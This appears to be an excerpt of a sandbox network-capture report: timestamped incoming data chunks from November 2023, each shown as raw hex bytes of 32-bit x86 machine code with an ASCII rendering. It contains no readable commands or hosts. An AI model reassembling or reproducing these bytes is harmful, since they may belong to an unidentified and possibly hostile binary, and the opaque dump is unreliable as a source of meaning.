00 00 50 8d 84 24 b8 09 00 00 50 ff 15 68 80 11 10 85 c0 75 13 68 f0 0f 13 10 ff d7 a1 Data Ascii: A;BhPh$jPj$hPhthL$(@$$@$RQyhh$jPP$P$hP$hjP$hP$Phuh
2023-11-18 09:02:39 UTC	1412	IN	Data Raw: 0c 38 47 89 7c 24 44 83 46 08 02 8b 5c 24 14 8b 74 24 18 8b d6 8b 4c 24 1c 6a 00 53 6a 00 e8 f2 10 00 00 83 c4 0c 89 44 24 24 89 44 24 10 85 c0 75 1d 8b 4c 24 1c 8b d6 50 8d 04 b3 50 6a 00 e8 d1 10 00 00 83 c4 0c 89 44 24 24 89 44 24 10 8b 4c 24 18 33 f6 85 c9 7e 3b 8b f9 8d 44 24 10 33 c9 50 8b 44 24 24 8b d7 38 0c 06 0f 45 d1 8d 4c 24 44 03 d6 8b 14 93 e8 79 31 00 00 46 83 c4 04 3b f7 7c d7 8b 44 24 10 8b 7c 24 44 8b 4c 24 18 89 44 24 24 33 f6 85 c9 0f 8e 9a 00 00 00 8b 4c 24 20 0f 1f 00 80 3c 0e 00 74 04 33 db eb 03 8b 1c b3 85 c0 75 73 8d 44 24 30 0f 57 c0 50 8b d3 66 0f 13 44 24 34 33 c9 e8 a8 5d 00 00 83 c4 04 89 44 24 10 85 c0 75 49 8b c7 8d 4c 24 40 99 03 44 24 30 13 54 24 34 52 50 8d 54 24 18 e8 83 31 00 00 8b 44 24 18 83 c4 08 8b 7c 24 44 85 c0 Data Ascii: 8G\|$DF\$t$L$jSjD$$D$uL$PPjD$$D$L$3~;D$3PD$$8EL$Dy1F;\|D$\|$DL$D$$3L$ <t3usD$0WPfD$43]D$uIL$@D$0T$4RPT$1D$\|$D
2023-11-18 09:02:39 UTC	1444	IN	Data Raw: 75 08 50 52 68 90 04 13 10 e8 87 0c 0c 00 83 c4 18 5d c3 cc cc 55 8b ec 83 ec 08 53 56 57 8b d9 89 55 f8 33 c0 33 ff 33 f6 89 45 fc ba bc 7d 12 10 85 db 7e 58 8b 4d 0c 8b 45 14 80 3c 06 00 75 37 8b 45 10 c7 45 fc 01 00 00 00 8b 04 b0 50 51 ff 75 08 50 51 ff 75 f8 52 57 68 58 04 13 10 e8 31 0c 0c 00 8b f8 83 c4 24 ba 84 04 13 10 85 ff 74 12 8b 4d 0c 8b 45 14 46 3b f3 7c be 8b 45 fc 85 c0 74 09 8b c7 5f 5e 5b 8b e5 5d c3 68 90 9d 12 10 e8 fe 0b 0c 00 83 c4 04 5f 5e 5b 8b e5 5d c3 cc cc cc cc 55 8b ec 51 53 56 57 8b d9 89 55 fc 33 ff 33 f6 ba bc 7d 12 10 85 db 7e 42 8b 4d 0c 8b 45 14 90 80 3c 06 00 74 30 8b 45 10 8b 04 b0 50 51 ff 75 08 50 51 ff 75 fc 52 57 68 34 04 13 10 e8 ae 0b 0c 00 8b f8 83 c4 24 ba 10 d8 12 10 85 ff 74 0b 8b 4d 0c 8b 45 14 46 3b f3 7c Data Ascii: uPRh]USVWU333E}~XME<u7EEPQuPQuRWhX1$tMEF;\|Et_^[]h_^[]UQSVWU33}~BME<t0EPQuPQuRWh4$tMEF;\|
2023-11-18 09:02:39 UTC	1453	IN	Data Raw: be 58 03 13 10 8b 45 08 ff 70 08 e8 f5 10 0c 00 56 68 10 8c 12 10 e8 5a e6 0b 00 8b 4d 08 83 c4 0c 5f 5e 89 41 08 b8 01 00 00 00 5b 8b e5 5d c3 cc cc cc cc cc 55 8b ec 8b 45 08 8b 4d 0c 8b 40 04 99 89 01 33 c0 89 51 04 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 8b 45 10 83 ec 08 56 57 83 e8 00 0f 84 bf 00 00 00 6a 00 83 e8 01 74 66 8b 7d 0c 8b 45 08 6a 01 6a ff 8b 37 8b 48 14 03 c9 6a ff 8b 56 20 8b 42 10 8b 14 c8 8b ce e8 7f cc 09 00 83 c4 10 85 c0 0f 84 c1 00 00 00 83 f8 12 75 22 8b 0f ba a4 94 12 10 6a 00 6a 01 6a ff 6a ff 89 47 14 e8 58 cc 09 00 83 c4 10 33 c0 5f 5e 8b e5 5d c3 57 e8 a7 51 09 00 83 c4 04 33 c0 5f 5e 8b e5 5d c3 8b 75 08 8d 4c 24 10 51 c7 44 24 14 00 00 00 00 8b 46 0c ff 76 04 50 8b 80 dc 00 00 00 ff d0 83 c4 10 85 c0 75 17 Data Ascii: XEpVhZM_^A[]UEM@3Q]UEVWjtf}Ejj7HjV Bu"jjjjGX3_^]WQ3_^]uL$QD$FvPu
2023-11-18 09:02:39 UTC	1456	IN	Data Raw: 85 02 00 00 00 03 f8 80 7e 09 00 8d 3c fe 89 7c 24 18 75 5a c7 86 28 05 00 00 00 00 00 00 c7 86 2c 05 00 00 00 00 00 00 c7 86 30 05 00 00 00 00 00 00 c7 86 34 05 00 00 00 00 00 00 c7 86 38 05 00 00 00 00 00 00 c7 86 3c 05 00 00 00 00 00 00 c7 86 48 05 00 00 00 00 00 00 c7 86 4c 05 00 00 00 00 00 00 c7 86 24 05 00 00 00 00 00 00 8b 47 08 3b 47 14 0f 8d d8 00 00 00 8b 47 08 8d 0c 40 8b 47 1c 8d 3c c8 8b 47 14 3b 47 08 0f 8d a7 00 00 00 0f 1f 00 80 7b 09 00 74 10 ff 43 0c 80 7b 0a 00 75 07 8b cb e8 5a a4 0a 00 80 7b 09 00 8b 43 04 8b 40 28 89 44 24 1c 74 0d 83 43 0c ff 75 07 8b cb e8 fd a4 0a 00 ff 86 24 05 00 00 8b ce e8 f0 05 00 00 8b 47 08 48 39 47 14 7d 16 8b 44 24 1c 83 c0 fc 99 01 86 38 05 00 00 11 96 3c 05 00 00 eb 27 8b 47 10 99 01 86 38 05 00 00 8b Data Ascii: ~<\|$uZ(,048<HL$G;GG@G<G;G{tC{uZ{C@(D$tCu$GH9G}D$8<'G8
2023-11-18 09:02:39 UTC	1459	IN	Data Raw: cc cc cc cc cc 55 8b ec b8 81 80 80 80 53 56 57 8b f9 8d 77 f4 80 fa 0d 75 19 c1 e6 05 f7 ee 03 d6 8d 77 dd c1 fa 07 8b da c1 eb 1f 83 c3 e9 03 da eb 2f 8b ce c1 e6 06 c1 e1 05 f7 e9 b8 81 80 80 80 03 d1 c1 fa 07 8b da 83 c2 e9 c1 eb 1f 03 da f7 ee 03 d6 c1 fa 07 8b f2 c1 ee 1f 83 c6 e9 03 f2 8b 45 08 8d 4f fc 2b c3 99 f7 f9 5f 03 d3 3b d6 5e 0f 4f d3 8b c2 5b 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 56 8b 75 08 8b ce e8 82 00 00 00 ff 76 04 e8 fa 48 09 00 56 e8 c4 f9 0b 00 83 c4 08 33 c0 5e 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc c7 81 28 05 00 00 00 00 00 00 c7 81 2c 05 00 00 00 00 00 00 c7 81 30 05 00 00 00 00 00 00 c7 81 34 05 00 00 00 00 00 00 c7 81 38 05 00 00 00 00 00 00 c7 81 3c 05 00 00 00 00 00 00 c7 81 48 05 00 00 00 00 00 00 c7 81 4c 05 Data Ascii: USVWwuw/EO+_;^O[]UVuvHV3^](,048<HL
2023-11-18 09:02:39 UTC	1463	IN	Data Raw: 0b c1 74 0e 51 57 e8 f2 ea 0b 00 83 c4 08 8b f8 eb 02 33 ff 85 ff 75 09 c7 46 28 07 00 00 00 eb 14 53 ff 74 24 14 57 e8 b1 24 fc ff 8b 44 24 20 83 c4 0c 89 18 8b 5d 0c ff 76 14 e8 8d 37 09 00 83 c4 04 83 7e 28 00 75 1d 89 46 28 85 c0 75 16 85 ff 75 12 53 ff 75 08 68 bc fe 12 10 56 e8 1a 00 00 00 83 c4 10 8b c7 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 56 8b 75 08 83 7e 28 00 75 4c 83 7e 30 64 7d 46 8d 45 10 50 ff 75 0c e8 71 be 0b 00 83 c4 08 85 c0 74 29 8b 4e 2c ba bc 7d 12 10 50 85 c9 b8 34 8f 12 10 0f 44 c2 50 51 68 84 fe 12 10 e8 1b be 0b 00 83 c4 10 89 46 2c 85 c0 75 07 c7 46 28 07 00 00 00 ff 46 30 5e 5d c3 cc cc cc cc 55 8b ec 51 53 56 57 8d 45 10 33 db 50 ff 75 0c 89 5d fc e8 18 be 0b 00 8b 75 08 83 c4 08 8b f8 39 5e Data Ascii: tQW3uF(St$W$D$ ]v7~(uF(uuSuhV_^[]UVu~(uL~0d}FEPuqt)N,}P4DPQhF,uF(F0^]UQSVWE3Pu]u9^
2023-11-18 09:02:39 UTC	1469	IN	Data Raw: 8b 42 0c 85 c0 74 0d 50 ff 15 20 23 14 10 8b 4d fc 83 c4 04 51 ff 76 24 68 74 f8 12 10 e8 1b a8 0b 00 83 c4 0c eb 33 6a 00 6a 00 8b d0 8b cf e8 79 03 09 00 8b 55 f8 8b cf 6a 00 6a 00 42 8b f0 e8 68 03 09 00 50 56 8b 75 f0 ff 76 24 68 94 f8 12 10 e8 e6 a7 0b 00 83 c4 20 89 46 08 57 e8 9a 21 09 00 83 c4 04 b8 13 00 00 00 85 db 0f 44 d8 5f 5e 8b c3 5b 8b e5 5d c3 cc cc cc cc 51 0f b7 41 08 a8 08 74 09 f2 0f 10 09 0f 57 d2 eb 2d a8 24 74 12 8b 51 04 8b 09 e8 c0 0a 0c 00 0f 28 c8 0f 57 d2 eb 17 a8 12 74 0d e8 6f 98 09 00 0f 28 c8 0f 57 d2 eb 06 0f 57 d2 0f 28 ca 0f 57 db f2 0f 5a d9 0f 5a c3 66 0f 2f c8 76 2a 66 0f 2f d1 76 12 f2 0f 10 05 e8 cc 13 10 f2 0f 59 c1 66 0f 5a c0 59 c3 f2 0f 10 05 f8 cc 13 10 f2 0f 59 c1 66 0f 5a c0 59 c3 0f 28 c3 59 c3 cc cc 51 0f Data Ascii: BtP #MQv$ht3jjyUjjBhPVuv$h FW!D_^[]QAtW-$tQ(Wto(WW(WZZf/v*f/vYfZYYfZY(YQ
2023-11-18 09:02:39 UTC	1491	IN	Data Raw: 08 03 c8 74 79 0f 1f 84 00 00 00 00 00 0f b6 43 17 0f af 44 24 14 ff 75 0c 8b 4c 10 04 8b 44 10 08 8b d7 0f c9 51 0f c8 50 8b cb e8 2d 02 00 00 83 c4 0c 89 44 24 10 85 c0 75 6e 8b 57 18 ff 44 24 14 0f b6 4a 02 0f b6 42 03 c1 e1 08 03 c8 39 4c 24 14 7c b8 eb 27 83 7c 24 2c 00 75 20 8b 44 24 28 8b d7 ff 75 0c 8b cb ff 70 04 ff 30 e8 ea 01 00 00 83 c4 0c 89 44 24 10 85 c0 75 2b 8b d6 8b cb e8 56 32 00 00 8b f0 85 f6 0f 85 9e 00 00 00 8b d7 8b cb e8 43 32 00 00 8b f0 e9 0a 01 00 00 c7 44 24 10 07 00 00 00 8b 74 24 18 85 f6 74 7a 83 46 10 ff 75 74 ff 4b 3c 83 7e 08 01 75 0d 83 7e 0c 00 75 07 c7 43 1c ff ff ff ff 8b 16 85 d2 74 0b 8b cb e8 03 32 00 00 85 c0 75 09 8b d6 8b cb e8 66 32 00 00 8b 46 08 0b 46 0c 74 33 8b 46 08 33 d2 b9 61 00 00 00 f7 f1 8d 4b 74 8b Data Ascii: tyCD$uLDQP-D$unWD$JB9L$\|'\|$,u D$(up0D$u+V2C2D$t$tzFutK<~u~uCt2uf2FFt3F3aKt
2023-11-18 09:02:39 UTC	1507	IN	Data Raw: 37 99 2b c2 d1 f8 0f b7 8c 45 80 fe ff ff 39 8d 78 fe ff ff 72 07 8b d8 8d 78 01 eb 03 8d 70 ff 3b f7 7d da 83 bd 74 fe ff ff 00 75 21 80 bc 1d 7c ff ff ff 00 7d 17 8b 85 7c fe ff ff 5f 5e 5b 8b 4d fc 33 cd e8 7f 73 fa ff 8b e5 5d c3 0f b7 8c 5d 80 fe ff ff 8b c1 83 e1 07 c1 e8 03 03 c1 8b 8d 7c fe ff ff 3b c8 7f 0b 0f b6 8c 1d 7c ff ff ff 83 e1 7f 8b c1 8b 4d fc 5f 5e 33 cd 5b e8 45 73 fa ff 8b e5 5d c3 cc cc cc cc cc 55 8b ec 51 57 8b f9 89 7d fc 81 ff 80 00 00 00 73 1e c1 ff 05 83 e1 1f b8 01 00 00 00 d3 e0 23 04 bd 18 56 13 10 f7 d8 5f 1b c0 40 8b e5 5d c3 81 ff 00 00 40 00 73 57 53 8b df b9 95 01 00 00 c1 e3 0a 33 ff 56 81 cb ff 03 00 00 33 f6 66 90 8d 04 0e 99 2b c2 d1 f8 3b 1c 85 40 44 13 10 72 07 8b f8 8d 70 01 eb 03 8d 48 ff 3b ce 7d e1 8b 0c bd Data Ascii: 7+E9xrxp;}tu!\|}\|_^[M3s]]\|;\|M_^3[Es]UQW}s#V_@]@sWS3V3f+;@DrpH;}
2023-11-18 09:02:39 UTC	1539	IN	Data Raw: 14 10 85 c0 74 0a 50 ff 15 18 23 14 10 83 c4 04 57 ff 15 f4 22 14 10 29 05 40 42 14 10 ff 0d 64 42 14 10 57 ff 15 ec 22 14 10 a1 e8 41 14 10 83 c4 08 85 c0 74 13 50 ff 15 20 23 14 10 eb 07 57 ff 15 ec 22 14 10 83 c4 04 c7 46 0c 00 00 00 00 8b 76 08 85 f6 75 96 5f 5e c3 cc cc cc 55 8b ec 83 e4 f8 83 ec 0c 53 56 8b f2 89 4c 24 0c 57 85 f6 75 04 33 db eb 31 0f b7 4e 08 8b c1 25 02 02 00 00 3d 02 02 00 00 75 0b 80 7e 0a 01 75 05 8b 5e 10 eb 14 f6 c1 01 74 04 33 db eb 0b b2 01 8b ce e8 a7 f5 08 00 8b d8 0f b7 46 08 a8 02 74 0b 80 7e 0a 01 75 05 8b 7e 0c eb 25 a8 10 74 0e 8b 7e 0c a9 00 40 00 00 74 17 03 3e eb 13 a8 01 74 04 33 ff eb 0b b2 01 8b ce e8 ef e5 08 00 8b f8 85 db 75 0a 8d 43 07 5f 5e 5b 8b e5 5d c3 83 ff 08 75 25 57 68 34 c5 12 10 53 e8 ae fe 0a 00 Data Ascii: tP#W")@BdBW"AtP #W"Fvu_^USVL$Wu31N%=u~u^t3Ft~u~%t~@t>t3uC_^[]u%Wh4S
2023-11-18 09:02:39 UTC	1545	IN	Data Raw: 24 44 85 ff 74 58 83 3d c8 22 14 10 00 74 45 a1 e8 41 14 10 85 c0 74 0a 50 ff 15 18 23 14 10 83 c4 04 57 ff 15 f4 22 14 10 29 05 40 42 14 10 83 c4 04 ff 0d 64 42 14 10 57 ff 15 ec 22 14 10 a1 e8 41 14 10 83 c4 04 85 c0 74 13 50 ff 15 20 23 14 10 eb 07 57 ff 15 ec 22 14 10 83 c4 04 85 f6 0f 84 0f ff ff ff 8b 5c 24 48 53 e8 05 23 0b 00 83 c4 04 ff 74 24 54 e8 f9 22 0b 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 85 f6 75 da 8b 5c 24 14 8b c3 8b 7c 24 18 0b c7 74 63 8b 4c 24 10 8d 44 24 20 56 50 8d 56 11 89 74 24 28 e8 d5 71 00 00 8b f0 83 c4 08 85 f6 75 ad ff 74 24 2c 8b 74 24 24 ff 74 24 34 6a 01 56 e8 68 4e 08 00 8b cb 8b c7 83 e9 01 83 d8 00 50 51 6a 02 56 e8 54 4e 08 00 56 e8 1e 60 08 00 83 c4 24 56 e8 e5 70 08 00 8b f0 83 c4 04 85 f6 0f 85 69 ff ff ff 8b 4c Data Ascii: $DtX="tEAtP#W")@BdBW"AtP #W"\$HS#t$T"_^[]u\$\|$tcL$D$ VPVt$(qut$,t$$t$4jVhNPQjVTNV`$VpiL
2023-11-18 09:02:39 UTC	1556	IN	Data Raw: 99 52 50 6a 02 57 e8 ea 21 08 00 6a 01 56 e8 72 2b 08 00 99 52 50 6a 03 57 e8 d7 21 08 00 83 c4 40 57 e8 9e 33 08 00 83 c4 04 57 e8 65 44 08 00 83 c4 04 89 44 24 1c 56 85 c0 75 46 e8 84 33 08 00 83 c4 04 83 f8 64 74 a1 8b 7d 08 56 e8 43 44 08 00 83 c4 04 85 c0 75 22 ff 75 0c 8b 74 24 14 57 6a 01 56 e8 8c 21 08 00 56 e8 56 33 08 00 83 c4 14 56 e8 1d 44 08 00 83 c4 04 5f 5e 5b 8b e5 5d c3 e8 0e 44 08 00 8b 44 24 20 83 c4 04 5f 5e 5b 8b e5 5d c3 55 8b ec 83 ec 14 53 56 57 52 51 e8 50 29 08 00 8b d8 83 c4 08 85 db 0f 84 ee 00 00 00 0f 57 c0 ba 01 00 00 00 66 0f 13 45 f8 33 c9 80 3b 30 8b 7d fc 8b 75 f8 89 55 f0 72 46 8a 03 89 7d f4 89 75 fc 3c 39 77 35 0f a4 f7 02 0f b6 c0 c1 e6 02 83 e8 30 01 75 fc 8b 75 fc 11 7d f4 8b 7d f4 0f a4 f7 01 99 03 f6 03 c6 8b f0 Data Ascii: RPjW!jVr+RPjW!@W3WeDD$VuF3dt}VCDu"ut$WjV!VV3VD_^[]DD$ _^[]USVWRQP)WfE3;0}uUrF}u<9w50uu}}
2023-11-18 09:02:39 UTC	1566	IN	Data Raw: 98 43 8b 7c 24 18 89 44 24 0c e9 75 ff ff ff 8b 44 24 0c 8b 74 24 10 89 3c 98 43 8b 7c 24 18 e9 60 ff ff ff 8b 74 24 10 e9 53 ff ff ff 8b 44 24 0c 8b 74 24 10 e9 4a ff ff ff 8b 74 24 0c bb 07 00 00 00 e9 c7 00 00 00 85 f6 74 39 39 5e 10 74 34 80 3e 01 b9 60 93 06 10 8b 5d 0c b8 c0 93 06 10 8b 7d 08 0f 45 c1 53 57 ff d0 8b 76 0c 8b d7 8b 4c 24 24 4e 23 f0 56 53 e8 bf 44 00 00 83 c4 10 33 ff eb 02 33 c0 89 44 24 18 85 c0 0f 84 b3 00 00 00 8d 7c 24 18 bb 01 00 00 00 89 7c 24 0c 8d 34 9d 64 00 00 00 e8 c1 45 01 00 85 c0 74 0b 33 c0 89 44 24 14 8d 58 07 eb 50 8b c6 83 c8 00 74 0d 6a 00 56 e8 63 cf 0a 00 83 c4 08 eb 02 33 c0 89 44 24 14 85 c0 75 05 8d 58 07 eb 2d 56 6a 00 50 e8 26 db f9 ff 8b 44 24 20 8d 48 60 c7 00 ff ff ff 7f 89 48 38 8d 04 9d 00 00 00 00 50 Data Ascii: C\|$D$uD$t$<C\|$`t$SD$t$Jt$t99^t4>`]}ESWvL$$N#VSD33D$\|$\|$4dEt3D$XPtjVc3D$uX-VjP&D$ H`H8P
2023-11-18 09:02:39 UTC	1573	IN	Data Raw: 04 89 07 5f 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec ff 75 0c ff 75 08 e8 b2 00 00 00 83 c4 08 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 51 53 56 57 8d 44 24 0c c7 44 24 0c 00 00 00 00 8b fa ba 16 00 00 00 6a 00 50 e8 0b 01 00 00 8b d8 83 c4 08 85 db 75 56 8b 74 24 0c 50 50 6a 01 56 e8 a4 dd 07 00 56 e8 6e ef 07 00 83 c4 14 83 f8 64 75 1a 53 56 e8 5f e3 07 00 83 c4 08 83 f8 04 75 0b 89 37 8b c3 5f 5e 5b 8b e5 5d c3 56 e8 16 00 08 00 83 c4 04 c7 07 00 00 00 00 85 c0 b9 0b 01 00 00 0f 44 c1 5f 5e 5b 8b e5 5d c3 8b 44 24 0c 89 07 8b c3 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 56 57 8d 45 fc c7 45 fc 00 00 00 00 8b fa ba 15 00 00 00 6a 00 50 e8 6f 00 00 00 8b c8 83 c4 08 85 c9 75 58 Data Ascii: _]Uuu]UQSVWD$D$jPuVt$PPjVVnduSV_u7_^[]VD_^[]D$_^[]UVWEEjPouX
2023-11-18 09:02:39 UTC	1593	IN	Data Raw: 40 84 c9 74 09 3a ca 75 f4 40 38 10 74 ef 85 c0 74 cb 2b c6 89 03 8b c6 5f 5e 5b c3 8a 07 8b cf 84 c0 74 0c 3c 5d 74 08 8a 41 01 41 84 c0 75 f4 80 39 00 8d 41 01 0f 44 c1 eb d3 84 d2 78 10 0f be ca 80 b9 f0 28 13 10 00 75 04 46 47 eb bf 8b c7 8a 08 84 c9 78 0c 0f be c9 80 b9 f0 28 13 10 00 74 ab 40 eb eb 5f 5e 33 c0 5b c3 90 29 79 06 10 b8 78 06 10 df 78 06 10 fe 78 06 10 00 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 01 03 03 03 03 01 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 02 03 03 03 03 01 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 84 c9 78 0f 0f be c1 80 b8 f0 28 13 10 00 75 03 33 c0 Data Ascii: @t:u@8tt+_^[t<]tAAu9ADx(uFGx(t@_^3[)yxxxx(u3
2023-11-18 09:02:39 UTC	1598	IN	Data Raw: 74 0b 8b cf e8 ec 02 00 00 85 c0 74 05 b8 01 00 00 00 85 c0 74 04 46 47 eb ab 80 3e 00 75 06 5f 33 c0 5e 5d c3 8a 06 84 c0 74 3d 0f be c0 0f be 80 ab 40 13 10 83 f8 02 7c 27 8a 46 01 84 c0 74 24 0f be c0 0f be 88 ab 40 13 10 83 f9 02 7d 09 b8 01 00 00 00 2b c1 eb 08 8d 4e 02 e8 c4 02 00 00 85 c0 74 03 46 eb bd 80 3e 00 74 b2 8a 06 84 c0 74 27 0f be c0 0f be 88 ab 40 13 10 83 f9 02 7d 09 b8 01 00 00 00 2b c1 eb 08 8d 4e 01 e8 92 02 00 00 85 c0 74 03 46 eb d3 80 3e 00 74 80 66 0f 1f 44 00 00 8a 06 84 c0 74 3d 0f be c0 0f be 80 ab 40 13 10 83 f8 02 7c 27 8a 46 01 84 c0 74 24 0f be c0 0f be 88 ab 40 13 10 83 f9 02 7d 09 b8 01 00 00 00 2b c1 eb 08 8d 4e 02 e8 44 02 00 00 85 c0 74 03 46 eb bd 33 c0 38 06 5f 0f 95 c0 5e 5d c3 cc cc 56 8b f1 57 8d 7e 02 8a 06 84 Data Ascii: tttFG>u_3^]t=@\|'Ft$@}+NtF>tt'@}+NtF>tfDt=@\|'Ft$@}+NDtF38_^]VW~
2023-11-18 09:02:39 UTC	1614	IN	Data Raw: 8b 7d f0 8b 47 14 89 45 08 85 c0 74 3b 83 38 00 74 36 83 3e 00 75 31 8b 5d fc 80 7f 20 00 75 25 ff 70 20 6a 00 ff 70 1c e8 a8 5d f9 ff 83 c4 0c 8b d7 8b cb 56 e8 1b fe ff ff 8b 45 08 83 c4 04 83 3e 00 74 d5 8b 5d ec c6 47 20 01 c6 43 20 01 5f 5e 5b 8b e5 5d c3 8b 43 10 8b 4b 0c 89 45 08 89 4d f0 8b 50 18 8b 40 1c 89 45 ec 39 41 1c 7c 10 7f 07 8b 41 18 3b c2 76 0c ba 01 00 00 00 eb 16 8b 41 18 3b c2 75 0c 8b 41 1c 3b 45 ec 75 04 33 d2 eb 03 83 ca ff 33 c0 39 45 f8 0f 94 c0 8d 04 45 ff ff ff ff 0f af c2 99 89 55 f4 8b 55 08 89 45 fc 80 7a 20 00 75 42 8a 41 20 8b 55 f4 84 c0 75 29 85 d2 7c 34 7f 06 83 7d fc 00 72 2c 84 c0 75 19 85 d2 7f 15 7c 06 83 7d fc 00 77 0d 8b d1 8b cf 56 e8 6c fd ff ff 83 c4 04 56 8b 75 08 8b cf 8b d6 e8 5c fd ff ff eb 0d 8b d1 8b cf Data Ascii: }GEt;8t6>u1] u%p jp]VE>t]G C _^[]CKEMP@E9A\|A;vA;uA;Eu339EEUUEz uBA Uu)\|4}r,u\|}wVlVu\
2023-11-18 09:02:40 UTC	2260	IN	Data Raw: 12 10 53 e8 4d 61 02 00 83 c4 14 85 c0 75 35 8b d7 8b cb e8 8d 87 ff ff 5f 5e 5b 8b e5 5d c3 be 07 00 00 00 8b cf e8 aa af ff ff 57 e8 b4 35 0a 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 be 07 00 00 00 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 4d 08 e8 75 af ff ff 5d e9 7f 35 0a 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 53 8b 5d 08 56 57 33 ff 0f 1f 44 00 00 8b 87 f0 29 13 10 85 db 75 17 f7 d8 1b c0 85 c0 74 2d 83 c7 04 83 ff 14 72 e6 5f 5e 33 c0 5b 5d c3 85 c0 74 ed 8b f0 8b d3 2b f3 0f 1f 44 00 00 0f b6 02 0f b6 0c 16 3b c1 75 0e 85 c0 75 1c 5f 5e b8 01 00 00 00 5b 5d c3 0f b6 89 80 72 13 10 0f b6 80 80 72 13 10 2b c1 75 b3 42 eb d2 cc cc 55 8b ec 8b 4d 08 e8 95 7a ff ff 33 c0 5d c3 cc 33 c0 c3 cc cc cc cc cc cc cc Data Ascii: SMau5_^[]W5_^[]_^[]UMu]5US]VW3D)ut-r_^3[]t+D;uu_^[]rr+uBUMz3]3
2023-11-18 09:02:40 UTC	2266	IN	Data Raw: 75 24 39 45 1c 75 1f 8b 4c 24 2c ba 01 00 00 00 8b 44 24 28 8b 7c 24 18 89 44 24 30 89 4c 24 0c 89 4c 24 34 eb 12 8b 44 24 2c 8b 7c 24 18 89 44 24 0c 8b 44 24 28 33 d2 8d 4c 24 14 51 57 53 ff 74 24 2c 8b 5d 20 ff 74 24 34 ff 74 24 48 8b 4b 04 ff 74 24 48 41 ff 74 24 28 50 e8 35 52 ff ff 8b f8 83 c4 24 85 ff 75 7a 8b 4b 04 8b c1 25 0f 00 00 80 79 05 48 83 c8 f0 40 75 27 8b 1b 8d 3c 8d 40 00 00 00 e8 8b 96 00 00 85 c0 75 47 50 57 8b cb e8 3e 1c 0a 00 83 c4 08 85 c0 74 37 8b 5d 20 89 03 8b 53 04 8b 0b 8b 44 24 14 89 04 91 ff 43 04 e9 0c fd ff ff 83 7d 18 00 0f 85 75 ff ff ff 83 7d 1c 00 0f 85 6b ff ff ff ba 01 00 00 00 e9 63 ff ff ff 8b 4c 24 14 e8 e7 52 ff ff bf 07 00 00 00 56 e8 bc 6c 07 00 83 c4 04 83 ff 65 0f 44 f8 8b c7 5f 5e 5b 8b e5 5d c3 cc cc cc cc Data Ascii: u$9EuL$,D$(\|$D$0L$L$4D$,\|$D$D$(3L$QWSt$,] t$4t$HKt$HAt$(P5R$uzK%yH@u'<@uGPW>t7] SD$C}u}kcL$RVleD_^[]
2023-11-18 09:02:40 UTC	2274	IN	Data Raw: 45 08 89 44 24 68 8b 45 14 89 84 24 80 00 00 00 8b 45 18 53 8b 5d 10 89 44 24 28 33 c0 89 44 24 18 89 44 24 50 8b 03 89 8c 24 80 00 00 00 33 c9 56 89 54 24 78 33 d2 57 33 ff 89 54 24 18 80 78 03 34 89 54 24 4c 0f 94 c1 89 54 24 78 89 4c 24 54 33 c9 33 c0 89 4c 24 60 8b 4b 04 89 5c 24 3c c7 44 24 2c 00 00 00 00 89 7c 24 5c 89 7c 24 40 8d 51 01 89 84 24 80 00 00 00 89 44 24 64 89 44 24 44 89 44 24 1c 89 44 24 34 89 44 24 48 89 44 24 38 89 44 24 28 89 44 24 24 8a 01 41 84 c0 75 f9 2b ca 8d 41 01 8b 4b 08 89 44 24 50 8d 51 01 0f 1f 44 00 00 8a 01 41 84 c0 75 f9 8b 5d 0c 2b ca 8d 41 01 89 84 24 84 00 00 00 8d 34 9d f8 ff ff ff e8 4e 74 00 00 85 c0 0f 84 87 00 00 00 33 c9 89 4c 24 14 be 07 00 00 00 89 74 24 18 a1 e8 41 14 10 8b 5c 24 28 33 ff 39 7c 24 24 0f 8e Data Ascii: ED$hE$ES]D$(3D$D$P$3VT$x3W3T$x4T$LT$xL$T33L$`K\$<D$,\|$\\|$@Q$D$dD$DD$D$4D$HD$8D$(D$$Au+AKD$PQDAu]+A$4Nt3L$t$A\$(39\|$$
2023-11-18 09:02:40 UTC	2279	IN	Data Raw: 44 24 20 89 5c 24 18 66 0f 1f 44 00 00 85 ff 75 26 68 74 09 13 10 68 4c 4f 01 00 68 4c e3 12 10 68 1c e3 12 10 6a 15 e8 01 c0 09 00 8b 7c 24 20 83 c4 14 33 f6 eb 5e 0f b7 87 98 00 00 00 33 f6 8b 1f 3b c8 7d 4b 85 c9 78 47 8b 43 0c 85 c0 74 0a 50 ff 15 18 23 14 10 83 c4 04 8b 47 7c 03 44 24 18 50 e8 25 37 07 00 83 c4 04 8b f0 80 7b 53 00 74 09 8b cb e8 53 e3 09 00 33 f6 8b 43 0c 85 c0 74 0a 50 ff 15 20 23 14 10 83 c4 04 8b 7c 24 0c 8b 5c 24 18 8d 4e 01 0f 1f 44 00 00 8a 06 46 84 c0 75 f9 8b 54 24 14 2b f1 8b 4c 24 24 8d 46 01 03 d0 8b 44 24 20 89 54 24 14 83 d0 00 41 83 c3 28 89 44 24 20 89 4c 24 24 89 5c 24 18 3b 4c 24 10 0f 8c 35 ff ff ff 8b 4c 24 10 33 ff 8d 1c 8d 00 00 00 00 8b f3 03 f2 13 f8 e8 3d 63 00 00 85 c0 74 0a 33 ff 8d 77 07 e9 71 01 00 00 8b Data Ascii: D$ \$fDu&hthLOhLhj\|$ 3^3;}KxGCtP#G\|D$P%7{StS3CtP #\|$\$NDFuT$+L$$FD$ T$A(D$ 